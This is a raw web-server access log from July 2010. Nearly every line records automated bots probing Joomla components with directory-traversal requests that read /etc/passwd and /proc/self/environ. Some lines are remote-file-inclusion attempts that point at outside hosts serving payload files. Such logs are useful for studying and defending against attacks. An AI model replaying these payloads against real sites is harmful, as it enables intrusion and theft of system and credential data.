94.23.215.207 - - [27/Jul/2010:09:52:56 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:09:53:18 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:53:19 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:53:20 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
65.60.4.74 - - [27/Jul/2010:09:59:03 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.834"
65.60.4.74 - - [27/Jul/2010:09:59:03 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
99.198.108.74 - - [27/Jul/2010:10:01:21 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:10:01:21 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
95.211.71.21 - - [27/Jul/2010:10:04:19 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:10:04:19 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:10:04:20 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:10:05:10 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:10:05:11 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:10:05:11 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
98.130.2.13 - - [27/Jul/2010:10:15:35 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:06 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:06 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:06 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
209.116.59.107 - - [27/Jul/2010:10:18:11 +0200] "GET //index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
209.116.59.107 - - [27/Jul/2010:10:18:11 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
209.116.59.107 - - [27/Jul/2010:10:18:13 +0200] "GET /logs/access_log%20%20//index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
92.43.201.28 - - [27/Jul/2010:10:24:39 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:24:40 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
209.116.59.107 - - [27/Jul/2010:10:28:59 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
76.242.100.234 - - [27/Jul/2010:10:29:50 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:29:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:31:15 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:31:15 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
207.46.13.146 - - [27/Jul/2010:10:36:07 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.146 - - [27/Jul/2010:10:37:40 +0200] "GET /?C=M;O=A HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.16.231.183 - - [27/Jul/2010:10:41:29 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
216.18.201.205 - - [27/Jul/2010:10:42:16 +0200] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:42:16 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:43:30 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
67.195.112.178 - - [27/Jul/2010:10:43:41 +0200] "GET /logs/?C=S;O=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.18.201.205 - - [27/Jul/2010:10:44:01 +0200] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:44:01 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:44:50 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
69.16.231.183 - - [27/Jul/2010:10:44:52 +0200] "GET /logs/access_log/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
69.16.231.183 - - [27/Jul/2010:10:44:52 +0200] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
69.16.231.183 - - [27/Jul/2010:10:44:52 +0200] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
213.145.228.170 - - [27/Jul/2010:10:45:10 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:45:31 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
114.108.151.149 - - [27/Jul/2010:10:46:24 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:10:46:24 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:10:46:25 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
216.18.201.205 - - [27/Jul/2010:10:46:44 +0200] "GET /logs/access_log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:46:44 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:46:44 +0200] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
213.145.228.170 - - [27/Jul/2010:10:47:55 +0200] "GET /logs/access_log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:47:55 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:47:55 +0200] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
98.130.2.13 - - [27/Jul/2010:10:48:12 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
79.244.87.243 - - [27/Jul/2010:10:52:19 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 367 "-" "Mozilla/5.0"
79.244.87.243 - - [27/Jul/2010:10:52:19 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 362 "-" "Mozilla/5.0"
79.244.87.243 - - [27/Jul/2010:10:52:19 +0200] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 378 "-" "Mozilla/5.0"
79.244.87.243 - - [27/Jul/2010:10:52:20 +0200] "GET /logs/error_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 377 "-" "Mozilla/5.0"
203.147.62.92 - - [27/Jul/2010:10:55:38 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:10:55:41 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:10:57:21 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:21 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:24 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:24 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:30 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:30 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
202.47.80.12 - - [27/Jul/2010:10:57:35 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:10:57:36 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
202.47.80.12 - - [27/Jul/2010:10:57:36 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:10:57:36 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:39 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:39 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:42 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:43 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
202.47.80.12 - - [27/Jul/2010:10:59:09 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:59:10 +0200] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:11:09:48 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:11:09:49 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:11:09:49 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
66.135.42.56 - - [27/Jul/2010:11:10:49 +0200] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ins.fileave.com/Bot/insid1.txt?? HTTP/1.1" 404 338 "-" "kmccrew Bot Search"
66.135.42.56 - - [27/Jul/2010:11:10:49 +0200] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ins.fileave.com/Bot/insid1.txt?? HTTP/1.1" 404 343 "-" "kmccrew Bot Search"
66.135.42.56 - - [27/Jul/2010:11:10:49 +0200] "GET /logs/access_log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ins.fileave.com/Bot/insid1.txt?? HTTP/1.1" 404 356 "-" "kmccrew Bot Search"
203.147.62.92 - - [27/Jul/2010:11:12:51 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:12:52 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:12:53 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:15:19 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:15:19 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
203.147.62.92 - - [27/Jul/2010:11:15:20 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
67.227.197.25 - - [27/Jul/2010:11:22:22 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:22 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:36 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:36 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:38 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:38 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
83.149.110.213 - - [27/Jul/2010:11:22:40 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:22:40 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
67.227.197.25 - - [27/Jul/2010:11:22:45 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:45 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:49 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:49 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
83.149.110.213 - - [27/Jul/2010:11:22:52 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:22:52 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:58 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
83.149.110.213 - - [27/Jul/2010:11:23:08 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:23:08 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
